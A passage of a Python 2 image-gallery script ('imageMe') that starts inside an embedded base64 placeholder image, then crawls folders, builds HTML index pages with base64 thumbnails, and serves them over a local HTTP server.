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BRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFAH/9k='
class BackgroundIndexFileGenerator:
def __init__(self, dir_path):
self.dir_path = dir_path
self.thread = threading.Thread(target=self._process, args=())
self.thread.daemon = True
def _process(self):
_create_index_files(self.dir_path)
def run(self):
self.thread.start()
def _clean_up(paths):
"""
Clean up after ourselves, removing created files.
@param {[String]} A list of file paths specifying the files we've created
during run. Will all be deleted.
@return {None}
"""
print('Cleaning up')
# Iterate over the given paths, unlinking them
for path in paths:
print('Removing %s' % path)
os.unlink(path)
def _create_index_file(
root_dir, location, image_files, dirs, force_no_processing=False):
"""
Create an index file in the given location, supplying known lists of
present image files and subdirectories.
@param {String} root_dir - The root directory of the entire crawl. Used to
ascertain whether the given location is the top level.
@param {String} location - The current directory of the crawl. The index
file will be created here.
@param {[String]} image_files - A list of image file names in the location.
These will be displayed in the index file's gallery.
@param {[String]} dirs - The subdirectories of the location directory.
These will be displayed as links further down the file structure.
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process thumbnails, PIL images or anything. Simply index
<img> tags with original file src attributes.
@return {String} The full path (location plus filename) of the newly
created index file. Intended for usage cleaning up created files.
"""
# Put together HTML as a list of the lines we'll want to include
# Issue #2 exists to do this better than HTML in-code
header_text = \
'imageMe: ' + location + ' [' + str(len(image_files)) + ' image(s)]'
html = [
'<!DOCTYPE html>',
'<html>',
' <head>',
' <meta http-equiv="Content-Type" content="text/html;charset=UTF-8">'
' <title>imageMe</title>'
' <style>',
' html, body {margin: 0;padding: 0;}',
' .header {text-align: right;}',
' .content {',
' padding: 3em;',
' padding-left: 4em;',
' padding-right: 4em;',
' }',
' .image {max-width: 100%; border-radius: 0.3em;}',
' td {width: ' + str(100.0 / IMAGES_PER_ROW) + '%;}',
' </style>',
' </head>',
' <body>',
' <div class="content">',
' <h2 class="header">' + header_text + '</h2>'
]
# Populate the present subdirectories - this includes '..' unless we're at
# the top level
directories = []
if root_dir != location:
directories = ['..']
directories += dirs
if len(directories) > 0:
html.append('<hr>')
# For each subdirectory, include a link to its index file
for directory in directories:
link = directory + '/' + INDEX_FILE_NAME
html += [
' <h3 class="header">',
' <a href="' + link + '">' + directory + '</a>',
' </h3>'
]
# Populate the image gallery table
# Counter to cycle down through table rows
table_row_count = 1
html += ['<hr>', '<table>']
# For each image file, potentially create a new <tr> and create a new <td>
for image_file in image_files:
if table_row_count == 1:
html.append('<tr>')
img_src = _get_thumbnail_src_from_file(
location, image_file, force_no_processing
)
link_target = _get_image_link_target_from_file(
location, image_file, force_no_processing
)
html += [
' <td>',
' <a href="' + link_target + '">',
' <img class="image" src="' + img_src + '">',
' </a>',
' </td>'
]
if table_row_count == IMAGES_PER_ROW:
table_row_count = 0
html.append('</tr>')
table_row_count += 1
html += ['</tr>', '</table>']
html += [
' </div>',
' </body>',
'</html>'
]
# Actually create the file, now we've put together the HTML content
index_file_path = _get_index_file_path(location)
print('Creating index file %s' % index_file_path)
index_file = open(index_file_path, 'w')
index_file.write('\n'.join(html))
index_file.close()
# Return the path for cleaning up later
return index_file_path
def _create_index_files(root_dir, force_no_processing=False):
"""
Crawl the root directory downwards, generating an index HTML file in each
directory on the way down.
@param {String} root_dir - The top level directory to crawl down from. In
normal usage, this will be '.'.
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process thumbnails, PIL images or anything. Simply index
<img> tags with original file src attributes.
@return {[String]} Full file paths of all created files.
"""
# Initialise list of created file paths to build up as we make them
created_files = []
# Walk the root dir downwards, creating index files as we go
for here, dirs, files in os.walk(root_dir):
print('Processing %s' % here)
# Sort the subdirectories by name
dirs = sorted(dirs)
# Get image files - all files in the directory matching IMAGE_FILE_REGEX
image_files = [f for f in files if re.match(IMAGE_FILE_REGEX, f)]
# Sort the image files by name
image_files = sorted(image_files)
# Create this directory's index file and add its name to the created
# files list
created_files.append(
_create_index_file(
root_dir, here, image_files, dirs, force_no_processing
)
)
# Return the list of created files
return created_files
def _get_image_from_file(dir_path, image_file):
"""
Get an instance of PIL.Image from the given file.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@return {PIL.Image} An instance of the image file as a PIL Image, or None
if the functionality is not available. This could be because PIL is not
present, or because it can't process the given file type.
"""
# Save ourselves the effort if PIL is not present, and return None now
if not PIL_ENABLED:
return None
# Put together full path
path = os.path.join(dir_path, image_file)
# Try to read the image
img = None
try:
img = Image.open(path)
except IOError as exptn:
print('Error loading image file %s: %s' % (path, exptn))
# Return image or None
return img
def _get_image_link_target_from_file(dir_path, image_file, force_no_processing=False):
"""
Get the value to be used as the href for links from thumbnail images. For
most image formats this will simply be the image file name itself. However,
some image formats (tif) are not natively displayable by many browsers and
therefore we must link to image data in another format.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process a thumbnail, PIL image or anything. Simply return the
image filename as src.
@return {String} The href to use.
"""
# If we've specified to force no processing, just return the image filename
if force_no_processing:
return image_file
# First try to get an image
img = _get_image_from_file(dir_path, image_file)
# If format is directly displayable in-browser, just return the filename
# Else, we need to return a full-sized chunk of displayable image data
if img.format.lower() in ['tif', 'tiff']:
return _get_image_src_from_file(
dir_path, image_file, force_no_processing
)
return image_file
def _get_image_src_from_file(dir_path, image_file, force_no_processing=False):
"""
Get base-64 encoded data as a string for the given image file's full image,
for use directly in HTML <img> tags, or a path to the original if image
scaling is not supported.
This is a full-sized version of _get_thumbnail_src_from_file, for use in
image formats which cannot be displayed directly in-browser, and therefore
need processed versions even at full size.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process a thumbnail, PIL image or anything. Simply return the
image filename as src.
@return {String} The base-64 encoded image data string, or path to the file
itself if not supported.
"""
# If we've specified to force no processing, just return the image filename
if force_no_processing:
if image_file.endswith('tif') or image_file.endswith('tiff'):
return UNSUPPORTED_IMAGE_TYPE_DATA
return image_file
# First try to get an image
img = _get_image_from_file(dir_path, image_file)
return _get_src_from_image(img, image_file)
def _get_index_file_path(location):
"""
Get the full file path to be used for an index file in the given location.
Yields location plus the constant INDEX_FILE_NAME.
@param {String} location - A directory location in which we want to create
a new index file.
@return {String} A file path for usage with a new index file.
"""
return os.path.join(location, INDEX_FILE_NAME)
def _get_server_port():
"""
Get the port specified for the server to run on. If given as the first
command line argument, we'll use that. Else we'll default to 8000.
@return {Integer} The port to run the server on. Default 8000, overridden
by first command line argument.
"""
return int(sys.argv[1]) if len(sys.argv) >= 2 else 8000
def _get_src_from_image(img, fallback_image_file):
"""
Get base-64 encoded data as a string for the given image. Fallback to return
fallback_image_file if cannot get the image data or img is None.
@param {Image} img - The PIL Image to get src data for
@param {String} fallback_image_file - The filename of the image file,
to be used when image data capture fails
@return {String} The base-64 encoded image data string, or path to the file
itself if not supported.
"""
# If the image is None, then we can't process, so we should return the
# path to the file itself
if img is None:
return fallback_image_file
# Target format should be the same as the original image format, unless it's
# a TIF/TIFF, which can't be displayed by most browsers; we convert these
# to jpeg
target_format = img.format
if target_format.lower() in ['tif', 'tiff']:
target_format = 'JPEG'
# If we have an actual Image, great - put together the base64 image string
try:
bytesio = io.BytesIO()
img.save(bytesio, target_format)
byte_value = bytesio.getvalue()
b64 = base64.b64encode(byte_value)
return 'data:image/%s;base64,%s' % (target_format.lower(), b64)
except IOError as exptn:
print('IOError while saving image bytes: %s' % exptn)
return fallback_image_file
def _get_thumbnail_image_from_file(dir_path, image_file):
"""
Get a PIL.Image from the given image file which has been scaled down to
THUMBNAIL_WIDTH wide.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@return {PIL.Image} An instance of the thumbnail as a PIL Image, or None
if the functionality is not available. See _get_image_from_file for
details.
"""
# Get image
img = _get_image_from_file(dir_path, image_file)
# If it's not supported, exit now
if img is None:
return None
if img.format.lower() == 'gif':
return None
# Get image dimensions
img_width, img_height = img.size
# We need to perform a resize - first, work out the scale ratio to take the
# image width to THUMBNAIL_WIDTH (THUMBNAIL_WIDTH:img_width ratio)
scale_ratio = THUMBNAIL_WIDTH / float(img_width)
# Work out target image height based on the scale ratio
target_height = int(scale_ratio * img_height)
# Perform the resize
try:
img.thumbnail((THUMBNAIL_WIDTH, target_height), resample=RESAMPLE)
except IOError as exptn:
print('WARNING: IOError when thumbnailing %s/%s: %s' % (
dir_path, image_file, exptn
))
return None
# Return the resized image
return img
def _get_thumbnail_src_from_file(dir_path, image_file, force_no_processing=False):
"""
Get base-64 encoded data as a string for the given image file's thumbnail,
for use directly in HTML <img> tags, or a path to the original if image
scaling is not supported.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process a thumbnail, PIL image or anything. Simply return the
image filename as src.
@return {String} The base-64 encoded image data string, or path to the file
itself if not supported.
"""
# If we've specified to force no processing, just return the image filename
if force_no_processing:
if image_file.endswith('tif') or image_file.endswith('tiff'):
return UNSUPPORTED_IMAGE_TYPE_DATA
return image_file
# First try to get a thumbnail image
img = _get_thumbnail_image_from_file(dir_path, image_file)
return _get_src_from_image(img, image_file)
def _run_server():
"""
Run the image server. This is blocking. Will handle user KeyboardInterrupt
and other exceptions appropriately and return control once the server is
stopped.
@return {None}
"""
# Get the port to run on
port = _get_server_port()
# Configure allow_reuse_address to make re-runs of the script less painful -
# if this is not True then waiting for the address to be freed after the
# last run can block a subsequent run
SocketServer.TCPServer.allow_reuse_address = True
# Create the server instance
server = SocketServer.TCPServer(
('', port),
SimpleHTTPServer.SimpleHTTPRequestHandler
)
# Print out before actually running the server (cheeky / optimistic, however
# you want to look at it)
print('Your images are at http://127.0.0.1:%d/%s' % (
port,
INDEX_FILE_NAME
))
# Try to run the server
try:
# Run it - this call blocks until the server is killed
server.serve_forever()
except KeyboardInterrupt:
# This is the expected way of the server being killed, since imageMe is
# intended for ad-hoc running from command line
print('User interrupted, stopping')
except Exception as exptn:
# Catch everything else - this will handle shutdowns via other signals
# and faults actually starting the server in the first place
print(exptn)
print('Unhandled exception in server, stopping')
def serve_dir(dir_path):
"""
Generate indexes and run server from the given directory downwards.
@param {String} dir_path - The directory path (absolute, or relative to CWD)
@return {None}
"""
if len(sys.argv) < 2:
print "python imageme.py [port|generate|cleanup]"
sys.exit(0)
if sys.argv[1] == "generate":
# Create index files, and store the list of their paths for cleanup later
# This time, force no processing - this gives us a fast first-pass in terms
# of page generation, but potentially slow serving for large image files
print('Performing first pass index file generation')
